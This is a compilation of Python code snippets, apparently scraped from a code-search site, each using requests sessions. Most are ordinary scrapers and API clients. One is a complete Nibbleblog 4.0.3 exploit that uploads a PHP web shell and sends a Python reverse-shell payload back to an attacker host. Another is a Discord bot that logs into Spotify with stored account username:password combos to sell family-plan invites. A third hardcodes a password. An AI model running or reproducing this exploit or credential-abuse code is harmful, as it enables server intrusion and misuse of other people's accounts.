    except (requests.ConnectionError, requests.ConnectTimeout,
            requests.ReadTimeout) as e:
        print(e)
        pass
Example #16
    def setup(self):
        self.session = requests.Session()
def replay(repo_dir, repo_path, start, end, project_id, dry_run, verbose):
    repo = git.Repo(repo_dir)

    end = repo.commit(end)
    start = repo.commit(start)

    username = config.jira_basic_auth_username
    password = config.jira_basic_auth_password

    jira_session = requests.Session()
    auth_data = {
        'username': config.jira_username,
        'password': config.jira_password
    }
    jira_session.post(config.jira_url + '/rest/auth/1/session',
                      json=auth_data,
                      auth=(username, password))

    data = OrderedDict()
    data['object_kind'] = 'push'

    commits = [
        commit for commit in recurse_commits(end,
                                             start=start,
                                             jira_session=jira_session,
                                             repo_path=repo_path,
                                             verbose=verbose)
    ]
    if not commits:
        logger.warning("Found no commits")
        return

    last_commit = commits[-1]
    if len(last_commit.parents) >= 1:
        data['before'] = last_commit.parents[0].hexsha
    else:
        data['before'] = '0000000000000000000000000000000000000000'

    data['after'] = commits[0].hexsha
    data['ref'] = 'refs/heads/master'
    data['checkout_sha'] = commits[0].hexsha
    data['repository'] = OrderedDict()
    data['repository']['url'] = 'git@%s:%s.git' % (config.git_base_url,
                                                   repo_path)
    data['repository']['homepage'] = 'https://%s/%s' % (config.git_base_url,
                                                        repo_path)
    data['repository']['description'] = ''
    data['repository']['git_http_url'] = 'https://%s/%s.git' % (
        config.git_base_url, repo_path)
    data['repository']['git_ssh_url'] = 'git@%s:%s.git' % (config.git_base_url,
                                                           repo_path)

    data['project_id'] = project_id

    data['commits'] = []

    for commit in commits:
        date = time.strftime('%Y-%m-%dT%H:%M:%S',
                             time.gmtime(commit.authored_date))
        logger.info("%20s @%s (%s): %s" %
                    (commit.author, date, commit.hexsha[:7], commit.summary))

        commit_data = OrderedDict()
        commit_data['id'] = commit.hexsha
        commit_data['message'] = commit.message

        if commit.author_tz_offset == -3600:
            offset = '+01:00'
        elif commit.author_tz_offset == -7200:
            offset = '+02:00'
        elif commit.author_tz_offset == 0:
            offset = '+00:00'
        else:
            assert False, "illegal offset: %s" % repr(commit.author_tz_offset)

        commit_data['timestamp'] = (time.strftime(
            '%Y-%m-%dT%H:%M:%S' + offset, time.gmtime(commit.authored_date)))
        commit_data['url'] = data['repository'][
            'homepage'] + '/commit/' + commit.hexsha
        commit_data['author'] = OrderedDict()
        commit_data['author']['name'] = commit.author.name
        commit_data['author']['email'] = commit.author.email

        commit_data['added'] = []
        commit_data['modified'] = []
        commit_data['removed'] = []

        for added in commit.parents[0].diff(commit).iter_change_type('A'):
            commit_data['added'].append(added.b_path)

        for modified in commit.parents[0].diff(commit).iter_change_type('M'):
            commit_data['modified'].append(modified.b_path)

        for deleted in commit.parents[0].diff(commit).iter_change_type('D'):
            commit_data['removed'].append(deleted.a_path)

        data['commits'].append(commit_data)

    data['total_commits_count'] = len(commits)

    if verbose:
        logger.debug(json.dumps(data, indent=4))

    if dry_run:
        logger.info("dry run. not posting")
    else:
        response = jira_session.post(config.jira_gitlab_listener_url,
                                     json=data,
                                     auth=(username, password))
        logger.info(response)

    jira_session.delete(config.jira_url + '/rest/auth/1/session',
                        auth=(username, password))
Example #18
def get_thermal(session=None):
    """
    Requests thermal generation data then parses and sorts by type.  Nuclear is included.
    Returns a dictionary.
    """

    # Need to persist the session in order to get ControlID and ReportSession so we can send a second request
    # for table data. Both of these variables change on each new request.
    s = session or requests.Session()
    r = s.get(url)
    pat = re.search("ControlID=[^&]*", r.text).group()
    spat = re.search("ReportSession=[^&]*", r.text).group()
    cid = pat.rpartition('=')[2]
    rs = spat.rpartition('=')[2]
    full_table = []

    # 'En Reserva' plants are not generating and can be ignored.
    # The table has an extra column on the 'Costo Operativo' page which must be removed to find power generated correctly.

    pagenumber = 1
    reserves = False

    while not reserves:
        t = s.get(turl, params = {'ControlID': cid, 'ReportSession': rs, 'PageNumber': '{}'.format(pagenumber)})
        text_only = webparser(t)
        if 'Estado' in text_only:
            for item in text_only:
                if len(item) == 1 and item in string.ascii_letters:
                    text_only.remove(item)
        if 'En Reserva' in text_only:
            reserves = True
            continue
        full_table.append(text_only)
        pagenumber += 1

    data = list(itertools.chain.from_iterable(full_table))
    formatted_data = dataformat(data)
    mapped_data = [power_plant_type.get(x,x) for x in formatted_data]

    for item in mapped_data:
        try:
            # avoids including titles and headings
            if all((item.isupper(), not item.isalpha(), ' ' not in item)):
                print('{} is missing from the AR plant mapping!'.format(item))
        except AttributeError:
            # not a string
            continue

    find_totals = [i+1 for i,x in enumerate(mapped_data) if x == 'Totales ']
    thermal_generation = sum([mapped_data[i] for i in find_totals])

    find_nuclear = [i+2 for i, x in enumerate(mapped_data) if x == 'nuclear']
    nuclear_generation = sum([mapped_data[i] for i in find_nuclear])
    find_oil = [i+2 for i, x in enumerate(mapped_data) if x == 'oil']
    oil_generation = sum([mapped_data[i] for i in find_oil])
    find_coal = [i+2 for i, x in enumerate(mapped_data) if x == 'coal']
    coal_generation = sum([mapped_data[i] for i in find_coal])
    find_biomass = [i+2 for i, x in enumerate(mapped_data) if x == 'biomass']
    biomass_generation = sum([mapped_data[i] for i in find_biomass])
    find_gas = [i+2 for i, x in enumerate(mapped_data) if x == 'gas']
    gas_generation = sum([mapped_data[i] for i in find_gas])

    unknown_generation = (thermal_generation - nuclear_generation - gas_generation \
                          - oil_generation - coal_generation - biomass_generation)

    if unknown_generation < 0.0:
        unknown_generation = 0.0

    return {'gas': gas_generation,
            'nuclear': nuclear_generation,
            'coal': coal_generation,
            'unknown': unknown_generation,
            'oil': oil_generation,
            'biomass': biomass_generation
           }
Example #19
    def __init__(self, config):
        self.config = config
        self.session = requests.Session()
Example #20
def main():

    # args
    argparser = argparse.ArgumentParser(
        description='Nibbleblog 4.0.3 Shell Upload Exploit', add_help=False)
    main_arg = argparser.add_argument_group("MAIN")

    main_arg.add_argument('-h',
                          '--help',
                          help='Show this help menu',
                          action='store_true')

    main_arg.add_argument('--rhost',
                          type=str,
                          help='Nibbleblog host',
                          required=True)

    main_arg.add_argument('--lhost',
                          type=str,
                          help='Local host to receive reverse shell',
                          required=True)

    main_arg.add_argument(
        '--lport',
        type=str,
        help='Local port to receive reverse shell (default: 4444)',
        default='4444')

    main_arg.add_argument('--login',
                          type=str,
                          help='Nibbleblog login',
                          required=True)

    main_arg.add_argument('--password',
                          type=str,
                          help='Nibbles password',
                          required=True)

    main_arg.add_argument('--burpsuite',
                          action='store_true',
                          help='Enable burpsuite proxy')

    args = argparser.parse_args()

    # arg validation
    if args.help:
        argparser.print_help()
        sys.exit(1)

    # cons
    lhost = args.lhost
    lport = args.lport
    rhost = "http://" + args.rhost.replace('/', '')
    nibbleblog_login = args.login
    nibbleblog_password = args.password
    url_login = '******'.format(rhost)
    url_upload = '{}/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image'.format(
        rhost)
    url_webshell = '{}/nibbleblog/content/private/plugins/my_image/image.php?cmd=id'.format(
        rhost)
    burpsuite = args.burpsuite

    # req
    session = requests.Session()

    def login():

        post = {"username": nibbleblog_login, "password": nibbleblog_password}

        print(" [*] Sign-in using credentials...")

        try:
            r = session.post(url_login, data=post)
        except Exception as e:
            print(e)
        else:
            if "dashboard" in r.url:
                print(" [*] Logged with success!")
            else:
                print(
                    " [*] Failed to login with provided Nibbleblog credentials"
                )
                sys.exit(1)

    def exploit():

        with open('tmp_webshell.php', 'w') as f:
            f.write('<?php system($_GET["cmd"]) ?>')

        proxies = {"http": "127.0.0.1:8080"}

        headers = {
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
        }

        files = {
            "image": ("tmp_webshell.php", open("tmp_webshell.php", "rb"), "application/x-php")
        }

        multipart_form_data = {
            'controller': 'plugins',
            'plugin': 'my_image',
            'position': '4',
            'title': 'My image',
            'action': 'config',
            'caption': '',
            'image_resize': '1',
            'image_width': '230',
            'image_height': '200',
            'image_option': 'auto'
        }

        try:
            if burpsuite:
                r = session.post(url_upload,
                                 data=multipart_form_data,
                                 headers=headers,
                                 files=files,
                                 proxies=proxies)
            else:
                r = session.post(url_upload,
                                 data=multipart_form_data,
                                 headers=headers,
                                 files=files)

        except Exception as e:
            print(e)
        else:
            if 'successfully' in r.text:
                print(" [*] Web shell successfully uploaded, check at: {}".
                      format(url_webshell))
                print(" [*] Cleaning temporary web shell...")
                os.remove("tmp_webshell.php")
                print(
                    " [*] Setting up reverse shell using LHOST {} and LPORT {} ..."
                    .format(lhost, lport))
                rshell_payload = """;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{}",{}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' """.format(
                    lhost, lport)
                print(
                    " [*] In 10 seconds a connection will be received, run on a new terminal: nc -lvp {} and wait :)"
                    .format(lport))
                sleep(10)
                print(" [*] Reverse shell connection spawned!")

                try:
                    r = requests.get("{}{}".format(url_webshell,
                                                   rshell_payload))
                except Exception as e:
                    print(e)

            else:
                print("[*] Failed to upload web shell :(")
                sys.exit(1)

    # main
    print(" [>] Nibbleblog 4.0.3 Shell Upload Exploit")
    print(" [*] Exploit author: Curesec Research Team")
    print(" [*] Python script exploit author: nullarmor")

    login()
    exploit()
Example #21
    def __init__(self, app_key, app_secret, oauth_token, oauth_token_secret,
                 timeout=300, retry_count=None, retry_in=10, client_args=None,
                 handlers=None, chunk_size=1):
        """Streaming class for a friendly streaming user experience
        Authentication IS required to use the Twitter Streaming API

        :param app_key: (required) Your applications key
        :param app_secret: (required) Your applications secret key
        :param oauth_token: (required) Used with oauth_token_secret to make
                            authenticated calls
        :param oauth_token_secret: (required) Used with oauth_token to make
                                   authenticated calls
        :param timeout: (optional) How long (in secs) the streamer should wait
                        for a response from Twitter Streaming API
        :param retry_count: (optional) Number of times the API call should be
                            retried
        :param retry_in: (optional) Amount of time (in secs) to wait before
                         the previous API call is retried
        :param client_args: (optional) Accepts some requests Session
                            parameters and some requests Request parameters.
                            See
                            http://docs.python-requests.org/en/latest/api/#sessionapi
                            and requests section below it for details.
                            [ex. headers, proxies, verify(SSL verification)]
        :param handlers: (optional) Array of message types for which
                         corresponding handlers will be called

        :param chunk_size: (optional) Define the buffer size before data is
                           actually returned from the Streaming API. Default: 1
        """

        self.auth = OAuth1(app_key, app_secret,
                           oauth_token, oauth_token_secret)

        self.client_args = client_args or {}
        default_headers = {'User-Agent': 'Twython Streaming v' + __version__}
        if 'headers' not in self.client_args:
            # If they didn't set any headers, set our defaults for them
            self.client_args['headers'] = default_headers
        elif 'User-Agent' not in self.client_args['headers']:
            # If they set headers, but didn't include User-Agent..
            # set it for them
            self.client_args['headers'].update(default_headers)
        self.client_args['timeout'] = timeout

        self.client = requests.Session()
        self.client.auth = self.auth
        self.client.stream = True

        # Make a copy of the client args and iterate over them.
        # Pop out all the acceptable args at this point because they
        # will never be used again.
        client_args_copy = self.client_args.copy()
        for k, v in client_args_copy.items():
            if k in ('cert', 'headers', 'hooks', 'max_redirects', 'proxies'):
                setattr(self.client, k, v)
                self.client_args.pop(k)  # Pop, pop!

        self.api_version = '1.1'

        self.retry_in = retry_in
        self.retry_count = retry_count

        # Set up type methods
        StreamTypes = TwythonStreamerTypes(self)
        self.statuses = StreamTypes.statuses

        self.connected = False

        self.handlers = handlers if handlers else \
            ['delete', 'limit', 'disconnect']

        self.chunk_size = chunk_size
    def handle(self, *args, **options):
        while True:
            try:
                self.logger.debug('=' * columns)
                for slave in Slave.objects.all():
                    self.logger.debug('_' * columns)
                    self.logger.debug('slave: #{0} {1}'.format(slave.id, slave.ip))
                    tasks = Task.objects.filter(available=True, slave=slave)
                    if len(tasks):
                        self.logger.debug('queue: {}'.format(', '.join(map(lambda x: str(x.id), tasks))))

                        self.logger.debug('[**********fetch EB number**********]')
                        for task in tasks:
                            self.fetch_eb_number(task)

                        for i in range(len(tasks)):
                            task = tasks[i]
                            task_logger = Logger.objects.filter(task=task) if Logger.objects.filter(task=task) else None
                            test_id = None
                            self.logger.debug('current task: #{0} {1}'.format(task.id, task.test_config))
                            cfg_detail = json.load(open(os.path.join(config_dir, task.test_config), 'r'))
                            self.logger.debug('type: {0}'.format(cfg_detail['tag']))

                            # check slave status
                            try:
                                session = requests.Session()
                                session.trust_env = False
                                url = 'http://{}:9001/stat/'.format(slave.ip)
                                stat = json.loads(requests.get(url, timeout=5).text)
                            except Exception as e:
                                self.logger.debug(e)
                                self.logger.debug('slave is offline, skip')
                                break

                            # build with all patch
                            if cfg_detail['patch_method'] == 'bap':
                                self.logger.debug('test method: {0}'.format('bap'))
                                self.logger.debug('project: {0}'.format(cfg_detail['project_name']))
                                project = cfg_detail['project_name']
                                builder = Project.objects.get(name=project).builder_name
                                buildbot_link = base_buildbot_link.format(builder)
                                building_list = json.loads(requests.get(buildbot_link, verify=False).text)['currentBuilds']
                                query_attrs = '&'.join(map(lambda x: 'select='+str(x), building_list))

                                building_info_url = buildbot_link + 'builds?' + query_attrs
                                building_info = json.loads(requests.get(building_info_url, verify=False).content)

                                # if the config does not record a base build yet
                                if 'base_build' not in cfg_detail:
                                    self.logger.debug('searching EB number with reason: %s' % task.test_config)

                                    for k, v in building_info.items():
                                        if v is None or 'properties' not in v:
                                            continue
                                        for item in v['properties']:
                                            if task.test_config in item:
                                                self.logger.debug('new eb: %s' % k)
                                                with open(os.path.join(config_dir, task.test_config), 'w') as fs:
                                                    cfg_detail['base_build'] = cfg_detail['build']
                                                    cfg_detail['build'] = k
                                                    cfg_detail['build_url'] = BuildPath.objects.get(project__name=cfg_detail['project_name'], build_type=0).url
                                                    fs.write(json.dumps(cfg_detail))
                                    break

                                # check eb status
                                else:
                                    eb_url = '{0}builds/{1}'.format(buildbot_link, cfg_detail['build'])
                                    status = json.loads(requests.get(eb_url, verify=False).content)['text']
                                    self.logger.debug('EB {0} status: {1}'.format(cfg_detail['build'], status))
                                    if len(status) == 0:
                                        task_logger.update(description='bp')
                                        task_logger.update(build=cfg_detail['build'])
                                        continue
                                    elif status[1] == 'successful' or status[1] == 'Exception occured!':
                                        task_logger.update(description='bs')
                                        test_id = self.new_test_id()
                                    elif status[0] in ['failed', 'exception']:
                                        tasks.update(available=False, comment=status[2])
                                        task_logger.update(description='bf')
                                        continue
                                    else:
                                        self.logger.debug('skip this task\n')
                                        continue

                            # test directly
                            elif cfg_detail['patch_method'] == 'td':
                                # send task
                                test_id = self.new_test_id()

                            # slave is online
                            if 'atf_task_id' in stat:
                                if stat['atf_task_id'] != 'None' and stat['atf_task_id'] != '':
                                    self.logger.debug('atf_task_id: ' + stat['atf_task_id'])
                                    self.logger.debug('slave is busy')
                                    break
                                if cfg_detail['building'] == True:
                                    build_type_id = cfg_detail['build_type_id']
                                    project_id = cfg_detail['project_id']
                                    buildpath = BuildPath.objects.get(build_type=build_type_id, project__id=project_id)
                                    self.logger.debug('buildpath id:' + str(buildpath.id))
                                    buildbot_link = buildpath.buildbot_link
                                    self.logger.debug('buildbot: ' + buildbot_link)
                                    builder = re.search(r'builders/(.+)', buildbot_link).group(1)
                                    buildbot = Buildbot(builder, auth=('weiyunyx', 'ZAQxsw@123456'))
                                    status = buildbot.check_build_status(cfg_detail['build'])
                                    if status['finished']:
                                        if status['status'] in ['success', 'warnings', 'exception']:
                                            task_logger.update(description='bs')
                                        else:
                                            task.available = False
                                            task.save()
                                            task_logger.update(description='bf')
                                            self.logger.debug('build failed')
                                            break
                                    else:
                                        self.logger.debug('building')
                                        continue
                            else:
                                self.logger.debug('slave has no redis server')
                                break

                            # send task to slave
                            self.logger.debug('slave: #{0} {1}, {2} in queue'.format(slave.id, slave.ip, len(tasks)))
                            self.logger.debug('recent task({0}): {1}'.format(task.id, task.test_config))
                            self.logger.debug('type: {0}'.format(cfg_detail['tag']))
                            self.logger.debug('build: {0}'.format(cfg_detail['build']))
                            self.logger.debug('send task to slave')

                            if test_id is not None:
                                self.create_raw_folder(test_id=test_id, project=cfg_detail['project_name'], build=cfg_detail['build'])
                                url = '/'.join(['http:/', slave.ip + ':9001', 'test/'])
                                # post to the slave via the existing requests session instead of urllib2
                                data = {
                                    'test_config': task.test_config,
                                    'task_id': task.id,
                                    'test_id': test_id
                                }
                                self.logger.debug(data)
                                if session.post(url, data=data, timeout=1).text == 'Aye Sir':
                                    print('task sent')
                                    task.test_id = test_id
                                    task.available = False
                                    task.start()
                                    task.save()
                                    time.sleep(1)
                                break
                    else:
                        self.logger.debug('No tasks, skip')
            except Exception as e:
                exc_type, exc_obj, exc_tb = sys.exc_info()
                fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
                print(exc_type, fname, exc_tb.tb_lineno)
                print(e)
            time.sleep(timeout)
Exemple #23
def home(request):
    """
    Parameters:
    request[HttpRequest]
    --------------------------------------------
    Returns:
    render(request, 'init.html') [HttpResponse] => init.html is returned as HttpResponse
    Logic:
    it takes the inputted code from frontend request and sends it to hackerearth API
    if the code doesn't compile, then it finds the necessary keyword from error messages
    and searches for it on google with regex matching and suggests debug links
    """


    if request.method == 'POST':
        # POST requests land here; is_ajax() is required to capture the AJAX submission.
        if request.is_ajax():
            lang = request.POST.get('lang')
            source = request.POST.get('source')
            inputl = request.POST.get('input')

            data = {
                'client_secret': CLIENT_SECRET,
                'async': 0,
                'source': source,
                'lang': lang,
                'input': inputl,
                'time_limit': 5,
                'memory_limit': 262144,
            }

            # Post data to HackerEarth API
            s = requests.Session()
            s.mount("http://", requests.adapters.HTTPAdapter(max_retries=5))
            s.mount("https://", requests.adapters.HTTPAdapter(max_retries=5))
            r = s.post(RUN_URL, data=data)

            key_words = []
            compile_status = r.json()['compile_status'].strip()
            current_json = r.json()
            if compile_status != 'OK':
                rk = Rake()
                rk.extract_keywords_from_text(compile_status)
                for keyword in rk.get_ranked_phrases():
                    if 'hackerearth' in keyword:
                        continue
                    key_words.append(keyword)

                # filter extra information
                if len(key_words) >= 3:
                    key_words = key_words[-2:]
                key_words = list(reversed(key_words))
                key_words.append(compile_status)

                links = []
                desc = []
                import re
                for word in key_words:
                    page = s.get("https://www.google.co.in/search?q=" + word)
                    soup = BeautifulSoup(page.content, 'lxml')
                    for link in soup.find_all("a", href=re.compile(r"(?<=/url\?q=)(htt.*://.*)")):
                        debug_url = link["href"].replace("/url?q=", "").split('&')[0]
                        if 'webcache.googleusercontent.com' in debug_url:
                            continue
                        links.append(debug_url)
                        desc.append(link.text + ":" + get_domain(debug_url))

                current_json['debug_urls'] = links[:10]
                current_json['descriptions'] = desc[:10]
            return JsonResponse(current_json, safe=False)

    # A normal get request goes here
    return render(request, 'init.html')
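
The view above configures retries by mounting HTTPAdapter(max_retries=5) on both schemes before posting to the HackerEarth API. A small hedged sketch of the same idea using urllib3's Retry object, which also adds backoff; the helper name build_retrying_session and the chosen status codes are illustrative assumptions, not part of the example above:

import requests
from urllib3.util.retry import Retry


def build_retrying_session(total=5, backoff_factor=0.5):
    # Same spirit as s.mount(..., HTTPAdapter(max_retries=5)) above,
    # but with exponential backoff and retries on common 5xx responses.
    retry = Retry(total=total, backoff_factor=backoff_factor,
                  status_forcelist=(500, 502, 503, 504))
    adapter = requests.adapters.HTTPAdapter(max_retries=retry)
    session = requests.Session()
    session.mount('http://', adapter)
    session.mount('https://', adapter)
    return session
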
def __init__(self, **kwargs):
    for key, value in kwargs.items():
        setattr(self, key, value)
    self.info = 'login in bilibili in scanqr mode'
    self.cur_path = os.getcwd()
    self.session = requests.Session()
    self.__initialize()
def main():
    # Get command line arguments
    keyword, number_of_results, save_database, path, sortby_column, plot_results, start_year, end_year, debug = get_command_line_args()

    # Create main URL based on command line arguments
    if start_year:
        GSCHOLAR_MAIN_URL = GSCHOLAR_URL + STARTYEAR_URL.format(start_year)
    else:
        GSCHOLAR_MAIN_URL = GSCHOLAR_URL

    if end_year != now.year:
        GSCHOLAR_MAIN_URL = GSCHOLAR_MAIN_URL + ENDYEAR_URL.format(end_year)

    if debug:
        GSCHOLAR_MAIN_URL='https://web.archive.org/web/20210314203256/'+GSCHOLAR_URL

    # Start new session
    session = requests.Session()
    #headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}

    # Variables
    links = []
    title = []
    citations = []
    year = []
    author = []
    rank = [0]

    # Get content from number_of_results URLs
    for n in range(0, number_of_results, 10):
        #if start_year is None:
        url = GSCHOLAR_MAIN_URL.format(str(n), keyword.replace(' ','+'))
        if debug:
            print("Opening URL:", url)
        #else:
        #    url=GSCHOLAR_URL_YEAR.format(str(n), keyword.replace(' ','+'), start_year=start_year, end_year=end_year)

        print("Loading next {} results".format(n+10))
        page = session.get(url)#, headers=headers)
        c = page.content
        if any(kw in c.decode('ISO-8859-1') for kw in ROBOT_KW):
            print("Robot checking detected, handling with selenium (if installed)")
            try:
                c = get_content_with_selenium(url)
            except Exception as e:
                print("No success. The following error was raised:")
                print(e)

        # Create parser
        soup = BeautifulSoup(c, 'html.parser')

        # Get stuff
        mydivs = soup.find_all("div", {"class": "gs_r"})

        for div in mydivs:
            try:
                links.append(div.find('h3').find('a').get('href'))
            except: # catch *all* exceptions
                links.append('Look manually at: '+url)

            try:
                title.append(div.find('h3').find('a').text)
            except:
                title.append('Could not catch title')

            try:
                citations.append(get_citations(str(div.format_string)))
            except:
                warnings.warn("Number of citations not found for {}. Appending 0".format(title[-1]))
                citations.append(0)

            try:
                year.append(get_year(div.find('div',{'class' : 'gs_a'}).text))
            except:
                warnings.warn("Year not found for {}, appending 0".format(title[-1]))
                year.append(0)

            try:
                author.append(get_author(div.find('div',{'class' : 'gs_a'}).text))
            except:
                author.append("Author not found")

            rank.append(rank[-1]+1)

        # Delay 
        sleep(0.5)

    # Create a dataset and sort by the number of citations
    data = pd.DataFrame(list(zip(author, title, citations, year, links)), index = rank[1:],
                        columns=['Author', 'Title', 'Citations', 'Year', 'Source'])
    data.index.name = 'Rank'

    # Add columns with number of citations per year
    data['cit/year']=data['Citations']/(end_year + 1 - data['Year'])
    data['cit/year']=data['cit/year'].round(0).astype(int)

    # Sort by the selected columns, if exists
    try:
        data_ranked = data.sort_values(by=sortby_column, ascending=False)
    except Exception as e:
        print('Column to sort by not found. Sorting by the number of citations instead...')
        data_ranked = data.sort_values(by='Citations', ascending=False)
        print(e)

    # Print data
    print(data_ranked)

    # Plot by citation number
    if plot_results:
        plt.plot(rank[1:],citations,'*')
        plt.ylabel('Number of Citations')
        plt.xlabel('Rank of the keyword on Google Scholar')
        plt.title('Keyword: '+keyword)
        plt.show()

    # Save results
    if save_database:
        fpath_csv = os.path.join(path,keyword.replace(' ','_')+'.csv')
        fpath_csv = fpath_csv[:MAX_CSV_FNAME]
        data_ranked.to_csv(fpath_csv, encoding='utf-8')
def __init__(self, **kwargs):
    for key, value in kwargs.items():
        setattr(self, key, value)
    self.info = 'login in bilibili in mobile mode'
    self.session = requests.Session()
    self.__initialize()
Exemple #27
def get_session():
    if not getattr(thread_local, "session", None):
        thread_local.session = requests.Session()
    return thread_local.session
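
A hypothetical usage sketch for the helper above, assuming the module defines thread_local = threading.local(); each worker thread keeps its own Session, so connection pooling works without sharing one Session across threads. The fetch function and the URLs are illustrative:

import threading
from concurrent.futures import ThreadPoolExecutor

import requests

thread_local = threading.local()


def get_session():
    if not getattr(thread_local, 'session', None):
        thread_local.session = requests.Session()
    return thread_local.session


def fetch(url):
    # Reuse the per-thread Session for every request made by this worker.
    return get_session().get(url, timeout=10).status_code


urls = ['https://httpbin.org/get'] * 8
with ThreadPoolExecutor(max_workers=4) as pool:
    print(list(pool.map(fetch, urls)))
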
Exemple #28
async def redeem(ctx, arg1, arg2, arg3):
    await client.delete_message(ctx.message)
    allowed_countries = [
        'US', 'GB', 'DE', 'CA', 'AU', 'IT', 'NZ', 'MX', 'BE', 'FR', 'ID', 'SG',
        'BR', 'MY', 'PT', 'IL', 'DK', 'NL', 'ES', 'SE', 'NO', 'TR', 'TH', 'HU'
    ]
    accounts = []
    keys = []
    country = arg1.upper()
    keyGrab(keys)
    if country in allowed_countries:
        f = open('Accounts/' + str(country) + '.txt', 'r')
        for line in f:
            clean = line.split('\n')
            accounts.append(clean[0])

        f.close()
    if country not in allowed_countries:
        return await (client.say(
            'Sorry But the Country you Specified is Not Currently Offered'))
    if arg3 not in keys:
        return await (
            client.say('Sorry but you entered an invalid product key.'))
    if arg3 in keys:
        keys.remove(arg3)
        check = re.compile(
            '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)')
        mat = check.match(str(arg2))
        if mat:
            result = None
            while result != ',"success":true}':
                if len(accounts) == 0:
                    await client.say(
                        'Sorry We Are Out of Stock on That Country')
                    os.remove('Accounts/' + str(country) + '.txt')
                    f = open('Accounts/' + str(country) + '.txt', 'a')
                    for ELEM in accounts:
                        f.write(ELEM + '\n')

                    f.close()
                    break
                account = accounts.pop()
                combo = account.split(':')
                USER = combo[0]
                PASS = combo[1]
                try:
                    with requests.Session() as c:
                        url = 'https://accounts.spotify.com/en/login?continue=https:%2F%2Fwww.spotify.com%2Fint%2Faccount%2Foverview%2F'
                        headers = {
                            'Accept':
                            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
                            'User-Agent':
                            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'
                        }
                        page = c.get(url, headers=headers)
                        CSRF = page.cookies['csrf_token']
                        headers = {
                            'Accept':
                            '*/*',
                            'User-Agent':
                            'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1',
                            'Referer':
                            'https://accounts.spotify.com/en/login/?continue=https:%2F%2Fwww.spotify.com%2Fus%2Fgooglehome%2Fregister%2F&_locale=en-US'
                        }
                        url = 'https://accounts.spotify.com/api/login'
                        login_data = {
                            'remember': 'true',
                            'username': USER,
                            'password': PASS,
                            'csrf_token': CSRF
                        }
                        cookies = dict(
                            __bon=
                            'MHwwfC0xNDAxNTMwNDkzfC01ODg2NDI4MDcwNnwxfDF8MXwx')
                        login = c.post(url,
                                       headers=headers,
                                       data=login_data,
                                       cookies=cookies)
                        if '{"displayName":"' in login.text:
                            url = 'https://www.spotify.com/us/account/overview/'
                            capture = c.get(url, headers=headers)
                            csr = capture.headers['X-Csrf-Token']
                            url = 'https://www.spotify.com/us/family/api/master-invite-by-email/'
                            headers = {
                                'Accept': '*/*',
                                'User-Agent':
                                'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1',
                                'x-csrf-token': csr
                            }
                            login_data = {
                                'firstName': 'thomas',
                                'lastName': 'Payne',
                                'email': arg2
                            }
                            invite = c.post(url,
                                            headers=headers,
                                            json=login_data)
                            print(invite.text)
                            if '"success":true}' in invite.text:
                                await client.say(
                                    arg2 +
                                    ' has been successfully invited to a ' +
                                    country + ' Family Plan')
                                accounts.append(combo[0] + ':' + combo[1])
                                print(combo[0] + ':' + combo[1])
                                keyRemove(keys)
                                result = ',"success":true}'
                                channel = discord.utils.get(
                                    ctx.message.server.channels, name='logs')
                                await client.send_message(
                                    channel, arg2 + ' has been invited to a ' +
                                    country + ' Plan | using the key: ' +
                                    arg3 + ' | invited by the account: ' +
                                    combo[0] + ':' + combo[1] +
                                    ' | USER Who Redeemed Key: ' +
                                    str(ctx.message.author))
                                os.remove('Accounts/' + str(country) + '.txt')
                                f = open('Accounts/' + str(country) + '.txt',
                                         'a')
                                for ELEM in accounts:
                                    f.write(ELEM + '\n')

                                f.close()
                                break
                            if 'message":"Invite limit reached' in invite.text:
                                result = None
                            if 'message":"No family plan found for user' in invite.text:
                                result = None
                        if '{"error":"errorInvalidCredentials"}' in login.text:
                            result = None
                except:
                    # swallow failures for this account and move on to the next one
                    pass

        if not mat:
            return await (client.say('Sorry But an Invalid Email Was Given'))
Exemple #29
payloadHeader = {
    "User-Agent":
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
}

param = {
    'name': '',
    'idcardno': '',
    'isLoss': '',
    'province': '',
    'hasCollection': '',
    'page': '1',
    'num': '20'
}

s = requests.Session()

# visit the index and list pages first so the session carries their cookies
s.get('https://www.bjp2p.com.cn/index', headers=payloadHeader)
s.get('https://www.bjp2p.com.cn/malice/maliceList', headers=payloadHeader)

# `url` and `proxy` are presumably defined earlier in the original module (query endpoint and proxy settings)
resp = s.post(url, data=param, timeout=3, verify=False, proxies=proxy).text
resp_dic = json.loads(resp).get('maliceList')

# parse the response
page_num = 1
df_total = pd.DataFrame()


def get_content(page_num, proxy, df_total):
    #flag = True
    import random
Exemple #30
  def _sync_download(self, url, destination_path):
    """Synchronous version of `download` method."""
    proxies = {
        'http': os.environ.get('TFDS_HTTP_PROXY', None),
        'https': os.environ.get('TFDS_HTTPS_PROXY', None),
        'ftp': os.environ.get('TFDS_FTP_PROXY', None)
    }
    if kaggle.KaggleFile.is_kaggle_url(url):
      if proxies['http']:
        os.environ['KAGGLE_PROXY'] = proxies['http']
      return self._sync_kaggle_download(url, destination_path)

    try:
      # If url is on a filesystem that gfile understands, use copy. Otherwise,
      # use requests.
      if not url.startswith('http'):
        return self._sync_file_copy(url, destination_path)
    except tf.errors.UnimplementedError:
      pass

    session = requests.Session()
    session.proxies = proxies
    if _DRIVE_URL.match(url):
